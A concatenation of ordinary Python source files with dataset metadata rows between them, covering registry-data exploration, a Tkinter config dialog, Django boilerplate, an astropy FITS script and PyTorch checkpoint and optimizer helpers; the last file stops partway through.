'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
xs = list(dfx['LopNr'].values)
ys = list(dfy['LopNr'].values)
sx = set(xs)
sy = set(ys)
cut = sx & sy
ux = sx - sy
uy = sy - sx
print()
# print('shape ' + namex + '\t\t', dfx.shape)
# print('shape ' + namey + '\t\t', dfy.shape)
# print('unique Lopnr ' + namex + '\t', len(xs))
# print('unique Lopnr ' + namey + '\t', len(ys))
print('common Lopnr\t\t\t', len(cut))
print('Lopnr in ' + namex + ' only\t', len(ux))
print('Lopnr in ' + namey + ' only\t', len(uy))
print()
ux = list(ux)
uy = list(uy)
ux.sort
uy.sort
return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
""" -------------------------------
4. count amd list various types of diagnosis
codes in care data
------------------------------------"""
"""
def is_icd10_class(x):
if not common.isstr(x):
return False
if common.is_icd10(x):
return False
if len(x) < 3:
return False
if not x[0].isupper():
return False
return x[1].isdigit() and x[2].isdigit()
"""
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
# print(x)
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
# print(x)
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
# print(x)
count += 1
return count
"""
def code_list(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
"""
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
"""
for c in df1[dia].values:
print('\t', c)
"""
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
#print(codes)
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
"""
size0 = len(df)
df = df.dropna().reset_index(drop=True)
print('nr of empty lines:', size0- len(df))
"""
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| 22.995444
| 71
| 0.525706
|
import global_settings as gs
import numpy as np
import pandas as pd
import bonsai_io as bio
import common
import copy
def nr_of_unique_rows(df):
d = df.drop_duplicates()
return len(d)
def nr_of_unique_values_in_cols(df, cols):
c = df.drop_duplicates(subset = cols)
return len(c)
def nr_of_unique_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
return len(c)
def nr_of_nonnan_values(df, col):
c = df[col].dropna()
return len(c)
def nr_of_unique_digital_values(df, col):
c = df[col].dropna()
c = c.drop_duplicates()
c = c.str.isdigit()
c = c[c].index.values
return len(c)
def duplicated_rows(df):
df['dup'] = df.duplicated()
df = df[df['dup'] == True]
return df
def print_duplicated_rows(df, nr):
dup = duplicated_rows(df)
print('Nr of rows in total', len(df))
print('Nr of duplicated rows', len(dup))
nr = min( nr,len(dup) )
if nr > 0:
print('the first', nr,' of them')
print(dup[0:nr])
return dup
def unique_number_values(df, col):
df = df.drop_duplicates(subset = col)
df = df[ df[col].str.contains('\d', regex=True) ]
return df
def info(df, name = ''):
print()
if name != '':
print()
print('--------------------------------------------------')
print()
print('\tInfo on the file\n\t' + name)
print()
print('--------------------------------------------------')
print()
df_unique_nr = nr_of_unique_rows(df)
print(' shape', df.shape)
print(' unique rows', df_unique_nr)
for c in df.columns:
print()
print('\tInfo on non-nan values of column', c)
print()
nonnan_nr = nr_of_nonnan_values(df, c)
unique_nr = nr_of_unique_values(df, c)
digital_nr = nr_of_unique_digital_values(df, c)
print('non-nan values', nonnan_nr)
print(' unique values', unique_nr)
print('digital values', digital_nr)
print()
def readall():
dia = bio.read_generated_dia()
dgr = bio.read_diagroups()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
dcl = bio.readdrugclasses()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [
dia,
dgr,
per,
ctr,
inc,
nic,
dru,
dcl,
tre,
sur,
cau
]
name = [
'diagnos ',
'diagnosgrupp ',
'person ',
'kontrollgrupp ',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'l_kemedelsgrupper',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def info_on_all():
data, name = readall()
for i in range(0, len(name)):
info(data[i], name[i])
def compare_lopnr(dfx, dfy, namex = 'data 1', namey = 'data 2'):
xs = list(dfx['LopNr'].values)
ys = list(dfy['LopNr'].values)
sx = set(xs)
sy = set(ys)
cut = sx & sy
ux = sx - sy
uy = sy - sx
print()
print('common Lopnr\t\t\t', len(cut))
print('Lopnr in ' + namex + ' only\t', len(ux))
print('Lopnr in ' + namey + ' only\t', len(uy))
print()
ux = list(ux)
uy = list(uy)
ux.sort
uy.sort
return ux, uy
def readlopnr():
dia = bio.read_generated_dia()
per = bio.readperson()
ctr = bio.readcontrol()
inc = bio.readincare()
nic = bio.readnicare()
dru = bio.readdrug()
tre = bio.readtreatment()
sur = bio.readsurgery()
cau = bio.readcause()
data = [dia, per, ctr, inc, nic, dru, tre, sur, cau]
name = [
'diagnos ',
'person ',
'kontrollgrupp',
'sluten v_rd ',
'_ppen v_rd ',
'l_kemedel ',
'behandling ',
'kirurgi ',
'orsak ',
]
return data, name
def pairwise_lopnr_comparisions():
data, name = readlopnr()
for i in range(0, len(name)):
for j in range(i+1, len(name)):
print()
print('--------------------------------------------------')
print()
print('\tComparing ' + name[i] + ' with ' + name[j])
print()
print('--------------------------------------------------')
print()
compare_lopnr(data[i], data[j], name[i], name[j])
def code_count(xs):
if not isinstance(xs, str):
return 0
return len(xs.split())
def icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10(x):
count += 1
return count
def not_icd10_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if not common.is_icd10(x):
count += 1
return count
def icd10_class_count(xs):
if not isinstance(xs, str):
return 0
count = 0
for x in xs.split():
if common.is_icd10_class(x):
count += 1
return count
def count_and_print(df, table = False):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['code_count'] = df[dia].apply(code_count)
dfc['icd10_count'] = df[dia].apply(icd10_count)
dfc['not_icd10_count'] = df[dia].apply(not_icd10_count)
dfc['icd10_class_count'] = df[dia].apply(icd10_class_count)
nr_of_codes = dfc['code_count'].sum()
nr_of_icd10 = dfc['icd10_count'].sum()
nr_of_not_icd10 = dfc['not_icd10_count'].sum()
nr_of_class_codes = dfc['icd10_class_count'].sum()
if table:
print('nr_of_lines\t', len(df))
print('nr_of_codes\t', nr_of_codes)
print('nr_of_icd10\t', nr_of_icd10)
print('nr_of_not_icd10\t', nr_of_not_icd10)
print('nr_of_icd10_class_codes\t', nr_of_class_codes)
else:
print(' nr_of_lines', len(df))
print(' nr_of_codes', nr_of_codes)
print(' nr_of_icd10', nr_of_icd10)
print(' nr_of_not_icd10', nr_of_not_icd10)
print(' nr_of_icd10_class_codes', nr_of_class_codes)
def print_dates(df, table = False):
date = 'INDATUM'
if table:
print('first date\t', df[date].min())
print('last date\t', df[date].max())
else:
print(' first date', df[date].min())
print(' last date', df[date].max())
def icd10_class_list(xs):
if not isinstance(xs, str):
return []
codes = []
for x in xs.split():
if common.is_icd10_class(x):
codes += [x]
return codes
def flat(xs):
ys = []
for x in xs:
ys += x
return ys
def print_class_codes(df):
dia = 'DIAGNOS'
dfc = copy.copy(df)
dfc['icd10_class'] = df[dia].apply(icd10_class_list)
dfc['is_class'] = dfc['icd10_class'].apply(lambda x: x != [])
dfc = dfc[dfc['is_class']]
codes = np.unique(flat(list(dfc['icd10_class'].values)))
for c in codes:
print('\t', c)
def diagnosis_code_count(df, print_class = False, table = False):
date = 'INDATUM'
nr = 'LopNr'
icd10_start = np.datetime64('1998-01-01')
df[date] = df[date].apply(bio.str2time)
df = df.sort_values(date).dropna().reset_index(drop=True)
df1 = df[df[date] < icd10_start]
df2 = df[df[date] >= icd10_start]
print()
print('code counts before 1998_01_01:')
print()
print_dates(df1, table = table)
count_and_print(df1, table = table)
print()
print('code counts from 1998_01_01')
print()
print_dates(df2, table = table)
count_and_print(df2, table = table)
if print_class:
print()
print(' all icd10_class_codes:')
print_class_codes(df2)
print()
| true
| true
|
f7192ca4418b9d3bb4703a309575a6c835793c29
| 2,000
|
py
|
Python
|
daemon/core/gui/dialogs/mobilityconfig.py
|
montag451/core
|
3be162b0b0f54b35520b980023abdfad4ff5e489
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/core/gui/dialogs/mobilityconfig.py
|
montag451/core
|
3be162b0b0f54b35520b980023abdfad4ff5e489
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/core/gui/dialogs/mobilityconfig.py
|
montag451/core
|
3be162b0b0f54b35520b980023abdfad4ff5e489
|
[
"BSD-2-Clause"
] | null | null | null |
"""
mobility configuration
"""
from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| 30.769231
| 82
| 0.643
|
from tkinter import ttk
from typing import TYPE_CHECKING
import grpc
from core.gui.dialogs.dialog import Dialog
from core.gui.errors import show_grpc_error
from core.gui.themes import PADX, PADY
from core.gui.widgets import ConfigFrame
if TYPE_CHECKING:
from core.gui.app import Application
from core.gui.graph.node import CanvasNode
class MobilityConfigDialog(Dialog):
def __init__(
self, master: "Application", app: "Application", canvas_node: "CanvasNode"
):
super().__init__(
master,
app,
f"{canvas_node.core_node.name} Mobility Configuration",
modal=True,
)
self.canvas_node = canvas_node
self.node = canvas_node.core_node
self.config_frame = None
self.has_error = False
try:
self.config = self.app.core.get_mobility_config(self.node.id)
self.draw()
except grpc.RpcError as e:
self.has_error = True
show_grpc_error(e, self.app, self.app)
self.destroy()
def draw(self):
self.top.columnconfigure(0, weight=1)
self.top.rowconfigure(0, weight=1)
self.config_frame = ConfigFrame(self.top, self.app, self.config)
self.config_frame.draw_config()
self.config_frame.grid(sticky="nsew", pady=PADY)
self.draw_apply_buttons()
def draw_apply_buttons(self):
frame = ttk.Frame(self.top)
frame.grid(sticky="ew")
for i in range(2):
frame.columnconfigure(i, weight=1)
button = ttk.Button(frame, text="Apply", command=self.click_apply)
button.grid(row=0, column=0, padx=PADX, sticky="ew")
button = ttk.Button(frame, text="Cancel", command=self.destroy)
button.grid(row=0, column=1, sticky="ew")
def click_apply(self):
self.config_frame.parse_config()
self.app.core.mobility_configs[self.node.id] = self.config
self.destroy()
| true
| true
|
f7192d36362e57de19098cfbb44d604a21beea70
| 27
|
py
|
Python
|
src/user/__init__.py
|
aleksandrgordienko/melissa-quiz
|
49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f
|
[
"MIT"
] | null | null | null |
src/user/__init__.py
|
aleksandrgordienko/melissa-quiz
|
49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f
|
[
"MIT"
] | null | null | null |
src/user/__init__.py
|
aleksandrgordienko/melissa-quiz
|
49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f
|
[
"MIT"
] | null | null | null |
from user.user import User
| 13.5
| 26
| 0.814815
|
from user.user import User
| true
| true
|
f7192d364390595ddfd11a6ee7c5d20a2c7dadff
| 759
|
py
|
Python
|
revibe/_errors/accounts.py
|
Revibe-Music/core-services
|
6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2
|
[
"MIT"
] | 2
|
2022-01-24T23:30:18.000Z
|
2022-01-26T00:21:22.000Z
|
revibe/_errors/accounts.py
|
Revibe-Music/core-services
|
6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2
|
[
"MIT"
] | null | null | null |
revibe/_errors/accounts.py
|
Revibe-Music/core-services
|
6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2
|
[
"MIT"
] | null | null | null |
from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
# -----------------------------------------------------------------------------
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| 33
| 79
| 0.715415
|
from rest_framework.exceptions import APIException
from revibe._errors import network
from revibe._helpers import status
class AccountError(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = "The request could not be completed, please try again"
default_code = 'conflict'
class AccountNotFound(network.UnauthorizedError):
default_detail = "Could not identify the current user, please try again"
class NotArtistError(network.ForbiddenError):
default_detail = "Could not identify the current artist"
class ProfileNotFoundError(network.ExpectationFailedError):
default_detail = "The user's profile information could not be found"
| true
| true
|
f7192ecde00bc5320bdb6678d1b0c377180f6a7d
| 59
|
py
|
Python
|
resources/resources/enow/jython/pythonSrc/__init__.py
|
ENOW-IJI/ENOW-server
|
1398d5a9d037efcee2886f6c7393b5e396ab0c18
|
[
"Apache-2.0"
] | 3
|
2016-08-12T14:46:53.000Z
|
2016-08-13T02:54:58.000Z
|
resources/resources/enow/jython/pythonSrc/__init__.py
|
ENOW-IJI/ENOW-server
|
1398d5a9d037efcee2886f6c7393b5e396ab0c18
|
[
"Apache-2.0"
] | 1
|
2016-08-30T15:58:19.000Z
|
2016-08-30T15:58:19.000Z
|
python/enow/jython/pythonSrc/__init__.py
|
ENOW-IJI/api
|
415fc69fc8f1ad25f1619aca0fa932f92e8b9d09
|
[
"Apache-2.0"
] | null | null | null |
__all__ = ["preCode", "body", "postCode", "StreamToLogger"]
| 59
| 59
| 0.677966
|
__all__ = ["preCode", "body", "postCode", "StreamToLogger"]
| true
| true
|
f7192f1a1cfbc76f583f0c727d070157e0eb514b
| 542
|
py
|
Python
|
manage.py
|
preet4737/College-Event-Manager
|
c8da687adeaa4f7f16d717a554e0e7af609fd305
|
[
"MIT"
] | 3
|
2019-12-20T05:51:48.000Z
|
2020-02-01T20:56:39.000Z
|
manage.py
|
preet4737/College-Event-Manager
|
c8da687adeaa4f7f16d717a554e0e7af609fd305
|
[
"MIT"
] | 6
|
2020-03-24T05:42:57.000Z
|
2020-03-24T05:42:59.000Z
|
manage.py
|
preet4737/College-Event-Manager
|
c8da687adeaa4f7f16d717a554e0e7af609fd305
|
[
"MIT"
] | 4
|
2019-03-14T11:09:30.000Z
|
2019-03-31T18:12:59.000Z
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.875
| 74
| 0.686347
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project-vp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| true
| true
|
f7192f9313d327c6a79ea32950ca12ca646bc3cc
| 434
|
py
|
Python
|
src/accounts/migrations/0005_auto_20180606_0601.py
|
ciphertz/final
|
28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6
|
[
"bzip2-1.0.6"
] | null | null | null |
src/accounts/migrations/0005_auto_20180606_0601.py
|
ciphertz/final
|
28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6
|
[
"bzip2-1.0.6"
] | null | null | null |
src/accounts/migrations/0005_auto_20180606_0601.py
|
ciphertz/final
|
28cf265b0e3f1e71cd95d2bd90b5662ad6f3d4a6
|
[
"bzip2-1.0.6"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-06-06 06:01
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| 21.7
| 66
| 0.647465
|
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0004_userstripe'),
]
operations = [
migrations.RenameModel(
old_name='userStripe',
new_name='StripeAccount',
),
]
| true
| true
|
f7192fe132fcf5d6519186205108fc34b3226385
| 759
|
py
|
Python
|
Week1/brightest_pixel_position_fits.py
|
vinayak1998/Data_Driven_Astronomy
|
1d0dd82b2e9066759c442807c30c70bef096d719
|
[
"MIT"
] | 2
|
2021-05-21T07:31:49.000Z
|
2022-03-28T05:25:44.000Z
|
Week1/brightest_pixel_position_fits.py
|
vinayak1998/Data_Driven_Astronomy
|
1d0dd82b2e9066759c442807c30c70bef096d719
|
[
"MIT"
] | null | null | null |
Week1/brightest_pixel_position_fits.py
|
vinayak1998/Data_Driven_Astronomy
|
1d0dd82b2e9066759c442807c30c70bef096d719
|
[
"MIT"
] | 4
|
2020-11-24T21:12:16.000Z
|
2021-09-18T12:26:45.000Z
|
import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
# Run your `load_fits` function with examples:
bright = load_fits('image1.fits')
print(bright)
# You can also confirm your result visually:
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
# Plot the 2D image data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show()
| 25.3
| 48
| 0.708827
|
import numpy as np
import time
from astropy.io import fits
import matplotlib.pyplot as plt
def load_fits(filename):
start = time.perf_counter()
hdulist = fits.open(filename)
data = hdulist[0].data
result = np.where(data == np.amax(data))
coornidates = list(zip(result[0],result[1]))
end = time.perf_counter() - start
return coornidates[0]
if __name__ == '__main__':
bright = load_fits('image1.fits')
print(bright)
from astropy.io import fits
import matplotlib.pyplot as plt
hdulist = fits.open('image1.fits')
data = hdulist[0].data
plt.imshow(data.T, cmap=plt.cm.viridis)
plt.colorbar()
plt.show()
| true
| true
|
f719309e5d9927ab6c3ee41678119a9d8e7d506c
| 3,816
|
py
|
Python
|
development/multiImage_pytorch/persistence.py
|
anaikawadi/svbrdf-estimation
|
c977aa8448b2131af3960895afd1105d29e5484a
|
[
"MIT"
] | 14
|
2020-06-16T17:01:46.000Z
|
2021-12-10T02:02:28.000Z
|
development/multiImage_pytorch/persistence.py
|
huanyingyunhan/svbrdf-estimation
|
6c169b12210d2a92495c1ab1218dd3e4da0314a5
|
[
"MIT"
] | 1
|
2021-08-08T17:28:36.000Z
|
2021-08-13T17:20:47.000Z
|
development/multiImage_pytorch/persistence.py
|
huanyingyunhan/svbrdf-estimation
|
6c169b12210d2a92495c1ab1218dd3e4da0314a5
|
[
"MIT"
] | 5
|
2020-12-27T23:00:12.000Z
|
2021-12-10T02:02:14.000Z
|
import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
# If there is no checkpoint file we try to perform a legacy load
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
# Restore checkpoint relevant arguments
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| 31.02439
| 85
| 0.619759
|
import gc
import json
import pathlib
import torch
class Checkpoint:
def __init__(self, checkpoint=None):
self.checkpoint = checkpoint
@staticmethod
def get_checkpoint_path(checkpoint_dir):
return checkpoint_dir.joinpath("checkpoint.tar")
@staticmethod
def load_legacy(model_dir):
model_path = model_dir.joinpath("model.data")
state_path = model_dir.joinpath("state.json")
if not model_path.exists():
return None
checkpoint = {
'model_state_dict' : torch.load(model_path),
}
print("Loaded legacy model state")
if state_path.exists():
with open(state_path, 'r') as f:
state = json.load(f)
checkpoint['epoch'] = state['epoch']
print("Loaded legacy training state")
return checkpoint
@classmethod
def load(cls, checkpoint_dir):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_path = Checkpoint.get_checkpoint_path(checkpoint_dir)
if not checkpoint_path.exists():
checkpoint = Checkpoint.load_legacy(checkpoint_dir)
if checkpoint is None:
print("No checkpoint found in directory '{}'".format(checkpoint_dir))
return cls(checkpoint)
return cls(torch.load(checkpoint_path))
@staticmethod
def save(checkpoint_dir, args, model, optimizer, epoch):
if not isinstance(checkpoint_dir, pathlib.Path):
checkpoint_dir = pathlib.Path(checkpoint_dir)
checkpoint_dir.mkdir(parents=True, exist_ok=True)
checkpoint = {
'model_type' : args.model_type,
'use_coords' : True if args.use_coords else False,
'epoch' : epoch,
'model_state_dict': model.state_dict(),
}
if not args.omit_optimizer_state_save:
checkpoint['optimizer_state_dict'] = optimizer.state_dict()
torch.save(checkpoint, Checkpoint.get_checkpoint_path(checkpoint_dir))
def purge(self):
self.checkpoint = None
gc.collect()
def is_valid(self):
return self.checkpoint is not None
def restore_args(self, args):
if 'model_type' in self.checkpoint:
args.model_type = self.checkpoint['model_type']
print("Restored model type '{}'".format(args.model_type))
else:
print("Failed to restore model type")
if 'use_coords' in self.checkpoint:
args.use_coords = self.checkpoint['use_coords']
print("Restored use coords flag '{}'".format(args.use_coords))
else:
print("Failed to restore use coords flag")
return args
def restore_model_state(self, model):
if 'model_state_dict' in self.checkpoint:
model.load_state_dict(self.checkpoint['model_state_dict'])
print("Restored model state")
else:
print("Failed to restore model state")
return model
def restore_epoch(self, epoch):
if 'epoch' in self.checkpoint:
epoch = self.checkpoint['epoch']
print("Restored epoch {}".format(epoch))
else:
print("Failed to restore epoch")
return epoch
def restore_optimizer_state(self, optimizer):
if 'optimizer_state_dict' in self.checkpoint:
optimizer.load_state_dict(self.checkpoint['optimizer_state_dict'])
print("Restored optimizer state")
else:
print("Failed to restore optimizer state")
return optimizer
| true
| true
|
f7193160ab5b74cc0bfaf421bd89b39fb7242385
| 1,594
|
py
|
Python
|
models/helper.py
|
kobakobashu/posenet-python
|
52290733504fd0a130cc2301bad5db761c14a4e9
|
[
"Apache-2.0"
] | null | null | null |
models/helper.py
|
kobakobashu/posenet-python
|
52290733504fd0a130cc2301bad5db761c14a4e9
|
[
"Apache-2.0"
] | 9
|
2021-05-03T01:38:46.000Z
|
2021-07-14T13:13:25.000Z
|
models/helper.py
|
kobakobashu/posenet-python
|
52290733504fd0a130cc2301bad5db761c14a4e9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Models helper
These are helper functions for models.
"""
import torch.optim as optim
import torch.nn as nn
from configs.supported_info import SUPPORTED_OPTIMIZER, SUPPORTED_CRITERION
def get_optimizer(cfg: object, network: object) -> object:
"""Get optimizer function
This is function to get optimizer.
Args:
cfg: Config of optimizer.
network: Network of model.
Returns:
Optimizer object.
Raises:
NotImplementedError: If the optimizer you want to use is not suppoeted.
"""
optimizer_name = cfg.name
if not optimizer_name:
return None
if optimizer_name not in SUPPORTED_OPTIMIZER:
raise NotImplementedError('The optimizer is not supported.')
if optimizer_name == "adam":
return optim.Adam(network.parameters(),
lr=cfg.lr,
weight_decay=cfg.decay)
